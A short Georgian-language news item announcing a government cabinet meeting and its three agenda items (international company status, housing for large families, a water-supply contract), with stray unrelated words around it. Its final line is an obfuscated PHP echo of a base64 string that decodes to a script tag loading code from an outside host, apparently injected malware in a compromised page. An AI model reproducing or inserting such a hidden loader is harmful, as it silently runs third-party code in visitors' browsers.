celsiusi
ავერსი შნაიდერი

დღეს, 8 იანვარს, 14:00 საათზე, მთავრობის სხდომა გაიმართება. მთავრობის ადმინისტრაციის ცნობით, მინისტრთა კაბინეტი დღის წესრიგით გათვალისწინებულ 3 საკითხს განიხილავს.

საკითხებს ფინანსთა, ჯანმრთელობის და ინფრასტრუქტურის მინისტრები წარადგენენ. ეს საკითხებია:

  1. საქართველოს მთავრობის განკარგულებების პროექტები „პირისათვის საერთაშორისო კომპანიის სტატუსის მინიჭების შესახებ” (4 პროექტი), მომხსენებელი: ფინანსთა მინისტრი, ლაშა ხუციშვილი;
  2. საქართველოს მთავრობის განკარგულების პროექტი „უსახლკარო/მძიმე საცხოვრებელ პირობებში მყოფი მრავალშვილიანი ოჯახ(ებ)ის განსახლების მიზნობრივი სახელმწიფო პროგრამის დამტკიცების თაობაზე”, მომხსენებელი: ჯანდაცვის მინისტრ, ზურაბ აზარაშვილი;
  3. საქართველოს მთავრობის განკარგულების პროექტი „შპს „საქართველოს გაერთიანებული წყალმომარაგების კომპანიასა“ და ერთობლივ საწარმოს - Pfeiffer - EMIT-ს შორის გაფორმებულ ხელშეკრულებასთან დაკავშირებით“, მომხსენებელი: რეგიონული განვითარების და ინფრასტრუქტურის მინისტრი, ირაკლი ქარსელაძე;
197
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");